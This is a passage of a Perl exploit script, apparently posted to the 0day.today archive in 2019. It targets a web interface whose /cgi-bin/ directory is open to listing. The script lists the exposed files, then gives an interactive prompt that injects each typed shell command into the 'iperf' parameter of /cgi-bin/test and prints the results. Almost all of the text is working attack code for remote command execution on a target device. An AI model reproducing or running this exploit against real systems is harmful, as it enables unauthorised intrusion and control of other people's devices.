     print "[ Example: perl $0 192.168.1.1\n\n";
     exit;
}
my $host  =  $ARGV[0] =~ /^http:\/\// ?  $ARGV[0]:  'http://' . $ARGV[0];

my $user_agent = rand_ua("browsers");
my $browser  = LWP::UserAgent->new();
   $browser->timeout(10);
   $browser->agent($user_agent);
my $target = $host."/cgi-bin/";
my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);                      
my $response = $browser->request($request);
print "[ 401 Unauthorized!\n" and exit if ($response->code eq '401');
if (defined ($response->as_string()) && ($response->as_string() =~ m/<H2>Index of \/cgi-bin\/<\/H2>/)){
    print "[ Server: ", $response->header('Server'), "\n";
    print "[ The target is vulnerable\n";
    print "[\n[ Directory Traversal\n";
    my $tree = HTML::TreeBuilder->new_from_content($response->as_string());
    my @files = $tree->look_down(_tag => 'a');
    print "[ ", $host.$_->attr('href'), "\n" for @files;
    print "[\n[ Got root?\n";
while(1){
     my $cmd;
     print "[ \# ";
     chomp($cmd = <STDIN>);
     if($cmd eq "clear"){system $^O eq 'MSWin32' ? 'cls' : 'clear';}
     exit if $cmd eq 'exit';
     
    my $target = $host."/cgi-bin/test?iperf=;".$cmd;
    my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);
    my $response = $browser->request($request) or die "[ Exploit Failed: $!";
    print "[ ", $_, "\n" for split(/\n/,$response->content());
}


} else { 
        print "[ Exploit failed! The target isn't vulnerable\n";
        exit;
}

#  0day.today [2019-12-04]  #